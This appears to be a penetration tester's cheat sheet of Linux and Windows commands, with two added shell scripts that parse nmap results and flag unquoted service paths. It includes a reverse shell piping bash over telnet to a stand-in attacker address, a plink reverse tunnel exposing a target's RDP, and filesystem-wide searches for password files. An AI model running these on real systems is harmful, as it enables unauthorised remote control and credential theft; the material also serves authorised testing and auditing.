USEFUL COMMANDS

  • LINUX
  • Grepping multiple strings: egrep -i "string1|string2" -  e.g. nmap -sV -p21 10.0.0.* --open |egrep -i "report|open"
  • Creating ip lists: for i in `seq 1 255`;do echo 192.168.1.$i;done >ips.txt
  • Switching to previous directory: cd -
  • Switching to home directory: cd
  • Creating shortcut commands: alias netstat='netstat -antp' or even make up your own commands, e.g. alias makeips='for i in `seq 1 255`;do echo 192.168.1.$i;done'
  • Viewing installed software:
    • Debian based: dpkg --get-selections 
    • RPM based distributions (RHEL, Fedora Core, Cent OS, Suse Linux etc): rpm -qa
  • Searching for Information:
    • find / -name 'passw*' - Search for filenames starting with passw (quote the pattern so the shell does not expand it before find sees it)
    • find / -type f 2>/dev/null | xargs grep -l passw - Search for files whose contents contain passw (grep -rl passw / does the same in one command)
    • man -k <search_string> (e.g. man -k ftp) - will list all man pages that refer to ftp.
  • Reverse netcat shell without netcat:
    • Attacker: nc -lvp 1234
    • Target: mknod backpipe p && telnet <ATTACKERIP> 1234 0<backpipe | /bin/bash 1>backpipe
  • Reverse SSH tunnel:
    • setup ssh: service ssh start && sshd-generate
    • upload plink to target:
    • create reverse tunnel: plink.exe -l root -pw <your ssh pass> -R 3389:127.0.0.1:3389 <attackerIP>  (maps the target's RDP port to 127.0.0.1:3389 on your own box)
    • rdp into yourself to access target: rdesktop 127.0.0.1 -f
  • Finding open egress ports: nmap open.zorinaq.com
  • Open all HTTP hosts on network in firefox: for i in $(nmap -p80 -n 192.168.0.* --open |grep report |cut -d" " -f5);do firefox -new-tab $i;done (have firefox open before running)
  • Simple Web Server: python -m SimpleHTTPServer (Python 3: python3 -m http.server)
  • copying files via scp: scp *.txt <targetip>:
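The "open all HTTP hosts" one-liner above relies on cut -d" " -f5, which picks the wrong field whenever nmap resolves a name and prints "Nmap scan report for host (ip)". Below is an added example, not part of the original cheat sheet, that parses nmap's normal output properly: it remembers the current host from each report line (stripping the parentheses when a name is present) and only emits the host when a PORT/tcp line is actually in state open. The nmap output is a constructed sample, not a real scan.

```shell
#!/bin/sh
# Constructed sample of nmap "normal" output (not captured from a real scan).
# It mixes a bare-IP report line with a hostname-plus-IP report line, which is
# exactly the case that breaks a naive `grep report | cut -d" " -f5`.
SAMPLE_NMAP='Starting Nmap ( https://nmap.org )
Nmap scan report for 192.168.0.5
Host is up (0.0010s latency).
PORT   STATE SERVICE
80/tcp open  http

Nmap scan report for web.lab.example (192.168.0.7)
Host is up (0.0020s latency).
PORT   STATE SERVICE
80/tcp open  http

Nmap scan report for 192.168.0.9
Host is up (0.0015s latency).
PORT   STATE  SERVICE
80/tcp closed http
Nmap done: 256 IP addresses (3 hosts up) scanned in 2.5 seconds'

# open_hosts PORT  -  read nmap normal output on stdin and print one IP per
# line for every host whose PORT/tcp is reported as open.
open_hosts() {
    awk -v port="$1" '
        /^Nmap scan report for / {
            # Bare IP:       "Nmap scan report for 192.168.0.5"            -> field 5
            # Resolved name: "Nmap scan report for web.lab (192.168.0.7)" -> last field, parens stripped
            host = $5
            if ($NF ~ /^\(.*\)$/) host = substr($NF, 2, length($NF) - 2)
            next
        }
        # Only emit the host when the requested port is really open; this
        # does not depend on --open having filtered the scan for us.
        $1 == (port "/tcp") && $2 == "open" { print host }
    '
}

# Stand-alone demo: list the hosts with port 80 open. In real use replace the
# echo with firefox -new-tab "http://$ip/" as in the one-liner above.
printf '%s\n' "$SAMPLE_NMAP" | open_hosts 80 | while read -r ip; do
    echo "would open http://$ip/"
done
```

Pipe a live scan in with nmap -p80 -n 192.168.0.* | open_hosts 80; the -n flag avoids DNS lookups, but the parser copes either way.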

  • WINDOWS
  • quick ping sweep: for /L %i in (1,1,255) do @ping -n 1 192.168.1.%i |findstr TTL
  • Finding unquoted service paths:
    wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """
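The findstr chain above flags every auto-start service outside c:\windows whose path has no quote at all, so it also reports harmless paths such as C:\Tools\svc.exe -arg. The real weakness is an unquoted executable path that contains a space. Below is an added example (not from the original cheat sheet) that applies that tighter rule to a CSV export of the same data, as an auditor would when checking a fleet from a Linux box. It assumes the export was produced with wmic service get name,pathname,startmode /format:csv (columns Node,Name,PathName,StartMode); the lines here are a constructed sample, not real output.

```shell
#!/bin/sh
# Constructed sample of `wmic service get name,pathname,startmode /format:csv`
# output (assumed export format; values invented for the example).
SAMPLE_WMIC='Node,Name,PathName,StartMode
LAB-PC,Spooler,C:\Windows\System32\spoolsv.exe,Auto
LAB-PC,GoodSvc,"C:\Program Files\Good Vendor\svc.exe" -run,Auto
LAB-PC,BadSvc,C:\Program Files\Bad Vendor\Sub Dir\svc.exe,Auto
LAB-PC,ManualSvc,C:\Program Files\Other\svc.exe,Manual
LAB-PC,NoSpaceSvc,C:\Tools\svc.exe -arg,Auto'

# unquoted_service_paths  -  read the CSV on stdin and print "Name: exe path"
# for every auto-start service whose executable path is unquoted AND contains
# a space, i.e. the combination that lets a writable parent directory hijack
# the service. Paths under c:\windows\ are skipped, as in the findstr chain.
unquoted_service_paths() {
    awk -F, 'NR > 1 && NF >= 4 {
        name = $2; mode = $NF
        path = $3
        for (i = 4; i < NF; i++) path = path "," $i   # rejoin a path that itself had commas
        sub(/\r$/, "", mode)                          # wmic writes CRLF line endings
        if (tolower(mode) != "auto") next             # only services started at boot
        if (substr(path, 1, 1) == "\"") next          # already quoted: not affected
        lp = tolower(path)
        if (index(lp, "c:\\windows\\") == 1) next     # same exclusion as the findstr chain
        if (match(lp, /\.exe/) == 0) next             # no executable to isolate
        exe = substr(path, 1, RSTART + 3)             # drop any arguments after ".exe"
        if (index(exe, " ") > 0) print name ": " exe  # unquoted AND contains a space
    }'
}

# Stand-alone demo: only BadSvc should be reported.
printf '%s\n' "$SAMPLE_WMIC" | unquoted_service_paths
```

Every service the function reports should be fixed by quoting its binPath (sc config <name> binPath= "\"C:\path with spaces\svc.exe\"") and by making sure the intermediate directories are not writable by unprivileged users.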